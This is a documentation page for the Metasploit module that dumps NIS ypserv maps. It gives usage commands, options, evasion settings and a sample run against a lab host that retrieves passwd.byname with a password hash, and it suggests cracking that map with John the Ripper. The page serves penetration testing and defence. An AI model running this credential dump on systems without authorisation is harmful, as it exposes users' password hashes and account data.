NIS ypserv Map Dumper - Metasploit
This page contains detailed information about how to use the auxiliary/gather/nis_ypserv_map metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: NIS ypserv Map Dumper
Module: auxiliary/gather/nis_ypserv_map
Source code: modules/auxiliary/gather/nis_ypserv_map.rb
Disclosure date: -
Last modification time: 2020-01-16 14:21:09 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 111
List of CVEs: -
This module dumps the specified map from NIS ypserv. The following examples are from ypcat -x: Use "ethers" for map "ethers.byname" Use "aliases" for map "mail.aliases" Use "services" for map "services.byname" Use "protocols" for map "protocols.bynumber" Use "hosts" for map "hosts.byname" Use "networks" for map "networks.byaddr" Use "group" for map "group.byname" Use "passwd" for map "passwd.byname" You may specify a map by one of the nicknames above.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/nis_ypserv_map
msf auxiliary(nis_ypserv_map) > show targets
... a list of targets ...
msf auxiliary(nis_ypserv_map) > set TARGET target-id
msf auxiliary(nis_ypserv_map) > show options
... show and set options ...
msf auxiliary(nis_ypserv_map) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
DOMAIN: NIS domain
Knowledge Base
Introduction
If you've worked with old Unix systems before, you've probably encountered NIS (Network Information Service). The most familiar way of describing it is a sort of hybrid between DNS and LDAP.
Oracle says the following about it:
NIS is a distributed naming service. It is a mechanism for identifying and locating network objects and resources. It provides a uniform storage and retrieval method for network-wide information in a transport-protocol and media-independent fashion.
And on its use:
By running NIS, the system administrator can distribute administrative databases, called maps, among a variety of servers (master and slaves). The administrator can update those databases from a centralized location in an automatic and reliable fashion to ensure that all clients share the same naming service information in a consistent manner throughout the network.
The module documented within will allow a tester to dump any map from an
NIS server (running as ypserv). Usually, maps like passwd.byname
contain things like hashes and user info, which can go a long way during
a pentest.
Setup
Set up NIS as per https://help.ubuntu.com/community/SettingUpNISHowTo. If the link is down, you can find it via the Wayback Machine.
Options
PROTOCOL
Set this to either TCP or UDP. TCP is the default due to easy discovery.
DOMAIN
Set this to your NIS domain.
MAP
Set this to the NIS map you want to dump. The default is passwd. You
can use the nicknames described in the module info instead of the full
map names.
XDRTimeout
Set this to the timeout in seconds for XDR decoding of the response.
Usage
msf > use auxiliary/gather/nis_ypserv_map
msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.0.2
rhost => 192.168.0.2
msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
domain => gesellschaft
msf auxiliary(gather/nis_ypserv_map) > run
[+] 192.168.0.2:111 - Dumping map passwd.byname on domain gesellschaft:
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
games:*:5:60:games:/usr/games:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
uuidd:*:108:112::/run/uuidd:/bin/false
dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
root:*:0:0:root:/root:/bin/bash
sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
messagebus:*:107:111::/var/run/dbus:/bin/false
_apt:*:105:65534::/nonexistent:/bin/false
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
syslog:*:104:108::/home/syslog:/bin/false
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
pollinate:*:111:1::/var/cache/pollinate:/bin/false
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
lxd:*:106:65534::/var/lib/lxd/:/bin/false
[*] Auxiliary module execution completed
msf auxiliary(gather/nis_ypserv_map) >
After dumping a map, you can find it stored in loot later. You should
be able to run something like John the Ripper directly on the
passwd.byname map.
msf auxiliary(gather/nis_ypserv_map) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.0.2 passwd.byname text/plain /home/wvu/.msf4/loot/20180108143013_default_192.168.0.2_passwd.byname_509006.txt
msf auxiliary(gather/nis_ypserv_map) >
Go back to menu.
Msfconsole Usage
Here is how the gather/nis_ypserv_map auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/nis_ypserv_map
msf6 auxiliary(gather/nis_ypserv_map) > show info
Name: NIS ypserv Map Dumper
Module: auxiliary/gather/nis_ypserv_map
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
wvu <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes NIS domain
MAP passwd yes NIS map to dump
PROTOCOL tcp yes Protocol to use (Accepted: tcp, udp)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
Description:
This module dumps the specified map from NIS ypserv. The following
examples are from ypcat -x: Use "ethers" for map "ethers.byname" Use
"aliases" for map "mail.aliases" Use "services" for map
"services.byname" Use "protocols" for map "protocols.bynumber" Use
"hosts" for map "hosts.byname" Use "networks" for map
"networks.byaddr" Use "group" for map "group.byname" Use "passwd"
for map "passwd.byname" You may specify a map by one of the
nicknames above.
References:
https://tools.ietf.org/html/rfc1831
https://tools.ietf.org/html/rfc4506
Module Options
This is a complete list of options available in the gather/nis_ypserv_map auxiliary module:
msf6 auxiliary(gather/nis_ypserv_map) > show options
Module options (auxiliary/gather/nis_ypserv_map):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes NIS domain
MAP passwd yes NIS map to dump
PROTOCOL tcp yes Protocol to use (Accepted: tcp, udp)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
Advanced Options
Here is a complete list of advanced options supported by the gather/nis_ypserv_map auxiliary module:
msf6 auxiliary(gather/nis_ypserv_map) > show advanced
Module advanced options (auxiliary/gather/nis_ypserv_map):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
TIMEOUT 10 yes Number of seconds to wait for responses to RPC calls
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
XDRTimeout 10.0 yes XDR decoding timeout
Auxiliary Actions
This is a list of all auxiliary actions that the gather/nis_ypserv_map module can do:
msf6 auxiliary(gather/nis_ypserv_map) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/nis_ypserv_map auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/nis_ypserv_map) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
ONCRPC::tcp_request_fragmentation false no Enable fragmentation of TCP ONC/RPC requests
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Could not connect to portmapper
Here is a relevant code snippet related to the "Could not connect to portmapper" error message:
56: proto, # Protocol: TCP (6)
57: 100004, # Program: YPSERV (100004)
58: 2 # Program Version: 2
59: )
60: rescue Rex::ConnectionError
61: fail_with(Failure::Unreachable, 'Could not connect to portmapper')
62: rescue Rex::Proto::SunRPC::RPCError
63: fail_with(Failure::Unreachable, 'Could not connect to ypserv')
64: end
65:
66: # Flavor: AUTH_NULL (0)
Could not connect to ypserv
Here is a relevant code snippet related to the "Could not connect to ypserv" error message:
58: 2 # Program Version: 2
59: )
60: rescue Rex::ConnectionError
61: fail_with(Failure::Unreachable, 'Could not connect to portmapper')
62: rescue Rex::Proto::SunRPC::RPCError
63: fail_with(Failure::Unreachable, 'Could not connect to ypserv')
64: end
65:
66: # Flavor: AUTH_NULL (0)
67: sunrpc_authnull
68:
Could not call ypserv procedure
Here is a relevant code snippet related to the "Could not call ypserv procedure" error message:
76: res = sunrpc_call(
77: 8, # Procedure: ALL (8)
78: ypserv_all_call # Yellow Pages Service ALL call
79: )
80: rescue Rex::Proto::SunRPC::RPCError
81: fail_with(Failure::NotFound, 'Could not call ypserv procedure')
82: ensure
83: # Shut it down! Shut it down forever!
84: sunrpc_destroy
85: end
86:
Invalid response from server
Here is a relevant code snippet related to the "Invalid response from server" error message:
83: # Shut it down! Shut it down forever!
84: sunrpc_destroy
85: end
86:
87: unless res && res.length > 8
88: fail_with(Failure::UnexpectedReply, 'Invalid response from server')
89: return
90: end
91:
92: # XXX: Rex::Encoder::XDR doesn't do signed ints
93: case res[4, 4].unpack('l>').first
Invalid map <MAP_NAME> specified
Here is a relevant code snippet related to the "Invalid map <MAP_NAME> specified" error message:
91:
92: # XXX: Rex::Encoder::XDR doesn't do signed ints
93: case res[4, 4].unpack('l>').first
94: # Status: YP_NOMAP (-1)
95: when -1
96: fail_with(Failure::BadConfig, "Invalid map #{map_name} specified")
97: # Status: YP_NODOM (-2)
98: when -2
99: fail_with(Failure::BadConfig, "Invalid domain #{domain} specified")
100: end
101:
Invalid domain <DOMAIN> specified
Here is a relevant code snippet related to the "Invalid domain <DOMAIN> specified" error message:
94: # Status: YP_NOMAP (-1)
95: when -1
96: fail_with(Failure::BadConfig, "Invalid map #{map_name} specified")
97: # Status: YP_NODOM (-2)
98: when -2
99: fail_with(Failure::BadConfig, "Invalid domain #{domain} specified")
100: end
101:
102: map = begin
103: Timeout.timeout(datastore['XDRTimeout']) do
104: parse_map(res)
Could not parse map <MAP_NAME>
Here is a relevant code snippet related to the "Could not parse map <MAP_NAME>" error message:
108: 'XDR decoding timed out (try increasing XDRTimeout?)')
109: return
110: end
111:
112: if map.blank?
113: fail_with(Failure::Unknown, "Could not parse map #{map_name}")
114: return
115: end
116:
117: map_file = map.values.join("\n") + "\n"
118:
Go back to menu.
Related Pull Requests
- #9402 Merged Pull Request: Add NIS bootparamd domain name disclosure
- #9368 Merged Pull Request: Add ye olde NIS ypserv map dumper
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/tomcat_administration
- auxiliary/scanner/varnish/varnish_cli_file_read
- auxiliary/scanner/varnish/varnish_cli_login
- exploit/windows/browser/nis2004_antispam
- exploit/windows/browser/nis2004_get
- exploit/windows/http/minishare_get_overflow
- auxiliary/admin/http/pihole_domains_api_exec
- auxiliary/admin/mssql/mssql_enum_domain_accounts
- auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
- auxiliary/gather/hp_snac_domain_creds
- auxiliary/gather/searchengine_subdomains_collector
- auxiliary/gather/trackit_sql_domain_creds
- auxiliary/scanner/smb/smb_enumusers_domain
- auxiliary/scanner/smtp/smtp_ntlm_domain
- auxiliary/spoof/dns/bailiwicked_domain
- exploit/windows/browser/adobe_flash_domain_memory_uaf
- exploit/windows/http/hp_pcm_snac_update_domain
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/enum_domain
- post/windows/gather/enum_domain_group_users
- post/windows/gather/enum_domains
- post/windows/gather/enum_domain_tokens
- post/windows/gather/enum_domain_users
- auxiliary/gather/nis_bootparamd_domain
- auxiliary/admin/natpmp/natpmp_map
- auxiliary/admin/http/wp_google_maps_sqli
- auxiliary/scanner/dcerpc/endpoint_mapper
- exploit/multi/browser/chrome_array_map
- exploit/multi/fileformat/maple_maplet
- exploit/multi/http/splunk_mappy_exec
- exploit/multi/http/struts_default_action_mapper
Authors
wvu
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
